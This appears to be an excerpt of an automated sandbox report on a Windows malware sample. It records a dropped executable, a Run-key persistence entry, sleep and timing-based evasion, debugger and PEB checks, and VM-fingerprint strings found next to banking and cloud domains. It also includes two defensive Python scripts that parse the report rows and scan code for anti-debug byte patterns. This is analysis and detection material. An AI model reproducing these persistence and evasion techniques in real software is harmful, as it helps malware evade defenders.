Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_031609AD push ecx; mov dword ptr [esp], ecx 14_2_031609B6
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003E0046 push FFFFFF8Ch; iretd 14_2_003E0077
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003D21B0 push esi; retf 14_2_003D21BB
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003C8208 push ds; retf 14_2_003C820A
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003E0270 push edi; iretd 14_2_003E0278
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003E0268 push edi; iretd 14_2_003E0278
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003D039F push ss; ret 14_2_003D03C4
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003D03D1 push E16F236Ah; retn 0031h 14_2_003D03D6
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003D43C0 push edi; retf 14_2_003D43CC
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003DCBAE push eax; retf 14_2_003DCBB1
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003D4FC8 pushfd ; retf 14_2_003D4FDD
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_003DB681 push ebp; ret 14_2_003DB68C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Overfondle.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | File created: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Hakkebrttet
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E rdtsc 8_2_204A096E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6680Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3072Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 2.4 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -9223372036854770s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004065CE FindFirstFileA,FindClose,0_2_004065CE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004027AA FindFirstFileA,0_2_004027AA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose,14_2_003DB880
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
        Source: 545Ni1I.14.dr | Binary or memory string: tasks.office.comVMware20,11696501413o
        Source: 545Ni1I.14.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
        Source: 545Ni1I.14.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
        Source: 545Ni1I.14.dr | Binary or memory string: dev.azure.comVMware20,11696501413j
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
        Source: Overfondle.exe, 00000008.00000002.2170573580.000000000446E000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065800892.000000000446E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: 545Ni1I.14.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
        Source: 545Ni1I.14.dr | Binary or memory string: bankofamerica.comVMware20,11696501413x
        Source: 545Ni1I.14.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2615832475.00000000013DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
        Source: 545Ni1I.14.dr | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
        Source: firefox.exe, 00000011.00000002.2458322940.0000016A1F53C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - HKVMware20,11696501413]
        Source: 545Ni1I.14.dr | Binary or memory string: outlook.office.comVMware20,11696501413s
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
        Source: 545Ni1I.14.dr | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
        Source: 545Ni1I.14.dr | Binary or memory string: ms.portal.azure.comVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
        Source: 545Ni1I.14.dr | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
        Source: 545Ni1I.14.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
        Source: 545Ni1I.14.dr | Binary or memory string: global block list test formVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: outlook.office365.comVMware20,11696501413t
        Source: 545Ni1I.14.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
        Source: 545Ni1I.14.dr | Binary or memory string: interactiveuserers.comVMware20,11696501413
        Source: 545Ni1I.14.dr | Binary or memory string: discord.comVMware20,11696501413f
        Source: 545Ni1I.14.dr | Binary or memory string: AMC password management pageVMware20,11696501413
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | API call chain: ExitProcess graph end node | graph_0-3441
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | API call chain: ExitProcess graph end node | graph_0-3591
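The behaviour rows above are the sandbox's HTML table flattened to text: the Source cell runs straight into the description with no separator, and the "Jump to behavior" link labels are still attached. The Python script below is an added editorial example, not code from the Joe Sandbox report or from Joe Security, that splits such rows back into fields and builds a short triage summary: PEB reads and rdtsc hits per function, delays at or above a threshold, VM-fingerprint strings per source, and processes that queried DebugPort. The sample rows are copied from this page; the list of description prefixes, the VM marker list and the delay threshold (defaulting to the 30000 figure the report itself prints in its sleep-time rows) are the example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: rows copied verbatim from the behaviour tables on this page
# (cell boundaries are missing and the link labels are still attached).
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -9223372036854770s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E rdtsc 8_2_204A096E",
    r"Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior",
    r"Source: 545Ni1I.14.drBinary or memory string: dev.azure.comVMware20,11696501413j",
    r"Source: cmd.exe, 0000000E.00000002.2614682827.00000000008E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle",
    r"Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000",
    r"Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000",
    r"Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A0E3 mov ecx, dword ptr fs:[00000030h]8_2_2045A0E3",
]

# Description prefixes seen in this section (assumed list; extend it for other sections).
KINDS = [
    "Process information set", "Process information queried", "Process queried",
    "Thread delayed", "Thread sleep time", "Window / User API", "Last function",
    "Code function", "Binary or memory string", "File opened",
    "Dropped PE file which has not been started", "API coverage", "API call chain",
]
# The Source cell is whatever sits between "Source: " and the first known prefix.
ROW_RE = re.compile(r"^Source: (?P<source>.+?)(?P<kind>" + "|".join(map(re.escape, KINDS)) + r"): (?P<value>.*)$")
LINK_RE = re.compile(r"(?:Jump to behavior|Jump to dropped file)$")
# "8_2_204A096E rdtsc 8_2_204A096E": <process index>_<run>_<address>, body, then the same id as link text.
FUNC_RE = re.compile(r"^(?P<fid>\d+_\d+_[0-9A-F]{8}) (?P<body>.*?)\s*(?P=fid)?$")
PEB_RE = re.compile(r"\bfs:\[0*30h\]", re.I)        # fs:[30h] is the PEB pointer on 32-bit Windows
VM_MARKERS = ("VMware", "Hyper-V", "VirtualBox", "VBox", "QEMU")  # assumed marker list


def parse_rows(rows):
    """Split flattened rows into {source, kind, value} plus function fields for code rows."""
    records = []
    for raw in rows:
        m = ROW_RE.match(LINK_RE.sub("", raw.strip()))
        if not m:
            continue                                  # unknown prefix: skip rather than mis-split
        rec = {"source": m["source"].strip(), "kind": m["kind"], "value": m["value"].strip()}
        if rec["kind"] == "Code function":
            fm = FUNC_RE.match(rec["value"])
            if fm:
                rec["function"] = fm["fid"]
                rec["proc_index"] = int(fm["fid"].split("_")[0])
                rec["body"] = fm["body"].strip().rstrip(",")
        records.append(rec)
    return records


def triage(records, sleep_threshold=30000):
    """Aggregate the evasion-relevant rows; delay values are compared in the unit the report prints."""
    peb_reads, timing = Counter(), Counter()
    long_sleeps, vm_strings, debug_queries = [], defaultdict(list), set()
    for r in records:
        if r["kind"] == "Code function" and "function" in r:
            if PEB_RE.search(r["body"]):
                peb_reads[r["function"]] += 1
            elif "rdtsc" in r["body"].split():
                timing[r["function"]] += 1
        elif r["kind"] in ("Thread delayed", "Thread sleep time"):
            n = re.search(r"-?\d+", r["value"])
            if n and abs(int(n.group())) >= sleep_threshold:
                long_sleeps.append((r["source"], int(n.group())))
        elif r["kind"] == "Binary or memory string":
            for marker in VM_MARKERS:
                if marker in r["value"]:
                    vm_strings[r["source"]].append(marker)
                    break
        elif r["kind"] == "Process queried" and "DebugPort" in r["value"]:
            debug_queries.add(r["source"])
    return {"peb_reads": peb_reads, "timing": timing, "long_sleeps": long_sleeps,
            "vm_strings": dict(vm_strings), "debug_queries": debug_queries}


if __name__ == "__main__":
    for key, val in triage(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {val}")
```

The non-greedy Source match works only because every description starts with a known prefix; a row whose prefix is not in KINDS is skipped rather than split at the wrong place. The "Thread delayed" and "Thread sleep time" rows print their values in different units, so the threshold is a coarse filter over the raw numbers, not a unit conversion.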
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204A096E rdtsc
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0333D7B8 LdrInitializeThunk
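The "mov eax, dword ptr fs:[00000030h]" rows that the report emits for Overfondle.exe are its static marker for PEB access: on 32-bit Windows fs:[30h] holds the PEB pointer in the TEB. A PEB read on its own is not a debugger check; position-independent loader code also walks PEB->Ldr (offset 0x0C) to resolve APIs without an import table, which is why the report keeps "Contains functionality to read the PEB" separate from "Checks if the current process is being debugged". The scanner below is an added example, not code from the report or from the Joe Sandbox engine: it finds the byte encodings behind these rows (and behind the rdtsc rows) in a raw code blob and, for a PEB load into eax, looks in a short window for the follow-up reads that make it an anti-debug check (BeingDebugged at PEB+2, NtGlobalFlag at PEB+0x68). The byte blob is hand-assembled for the example; the window size and the eax-only follow-up patterns are assumptions.

```python
import re

# x86 (32-bit) encodings behind the sandbox rows. fs:[30h] is the PEB pointer in the TEB.
PATTERNS = {
    "mov eax, fs:[30h] (PEB)": rb"\x64\xA1\x30\x00\x00\x00",                  # short form, eax only
    "mov r32, fs:[30h] (PEB)": rb"\x64\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]\x30\x00\x00\x00",  # 8B /r, disp32
    "rdtsc":                   rb"\x0F\x31",
}
# Follow-up reads that turn a PEB load into a debugger check. Assumption: the PEB pointer
# is in eax (the form this page reports most often); ecx-based variants need other modrm bytes.
FOLLOWUPS = {
    "PEB.BeingDebugged read": rb"\x0F\xB6\x40\x02",   # movzx eax, byte ptr [eax+2]
    "PEB.BeingDebugged cmp":  rb"\x80\x78\x02\x00",   # cmp byte ptr [eax+2], 0
    "PEB.NtGlobalFlag read":  rb"\x8B\x40\x68",       # mov eax, dword ptr [eax+68h]
}


def scan(blob: bytes, window: int = 32):
    """Return hits sorted by offset; each PEB hit lists the follow-ups seen within `window` bytes."""
    hits = []
    for name, pat in PATTERNS.items():
        for m in re.finditer(pat, blob):
            hit = {"offset": m.start(), "what": name, "followups": []}
            if "PEB" in name:
                tail = blob[m.end(): m.end() + window]
                hit["followups"] = [f for f, fpat in FOLLOWUPS.items() if re.search(fpat, tail)]
            hits.append(hit)
    return sorted(hits, key=lambda h: h["offset"])


def is_debugger_check(hit) -> bool:
    """A PEB load counts as anti-debug only when a BeingDebugged/NtGlobalFlag read follows it."""
    return "PEB" in hit["what"] and bool(hit["followups"])


# Constructed sample: a small hand-assembled function, not bytes taken from the analysed sample.
SAMPLE = bytes.fromhex(
    "55 8B EC"                 # push ebp ; mov ebp, esp
    "64 A1 30 00 00 00"        # mov eax, fs:[30h]           ; PEB -> eax
    "0F B6 40 02"              # movzx eax, byte ptr [eax+2] ; PEB.BeingDebugged
    "85 C0"                    # test eax, eax
    "64 8B 0D 30 00 00 00"     # mov ecx, fs:[30h]           ; PEB -> ecx (API-resolution style)
    "8B 41 68"                 # mov eax, [ecx+68h]          ; not matched: eax-only follow-ups
    "0F 31"                    # rdtsc                       ; timing check
    "5D C3"                    # pop ebp ; ret
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        flag = "DEBUG-CHECK" if is_debugger_check(h) else "info"
        print(f"{h['offset']:#06x} {h['what']:<26} {flag} {h['followups']}")
```

0F 31 is two bytes and will fire on arbitrary data, so on a real PE restrict the scan to executable sections or to the function ranges the sandbox already flagged (8_2_204A096E above). A PEB load with no follow-up read is the common case in unpacked loader code and should be treated as API resolution, not evasion, until the disassembly says otherwise.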
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20462050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E6050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2048C073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045A020 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045C020 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F6030 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E20DE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045A0E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E60E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204680E9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045C0F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204A20F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046208A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204580A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F80A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_205260B8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_205260B8 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F4144 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045C156 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F8158 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20534164 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20520115 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050A118 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20490124 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_205261C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DE1D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204901F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_205361E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204A0185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20504180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2051C188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E8243 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E8243 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2053625D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045A250 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20466259 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045826B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045823B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_205362D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204702A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F62A0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204F62A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2052A352 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20508350 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E035C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204E035C mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2053634F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050437C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2049A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2045C310 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_20480310 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_205043D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204683C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2046A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h] (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E3DB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2050E3DB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_2051C3CD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204703E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Code function: 8_2_204963FF mov eax, dword ptr fs:[00000030h]
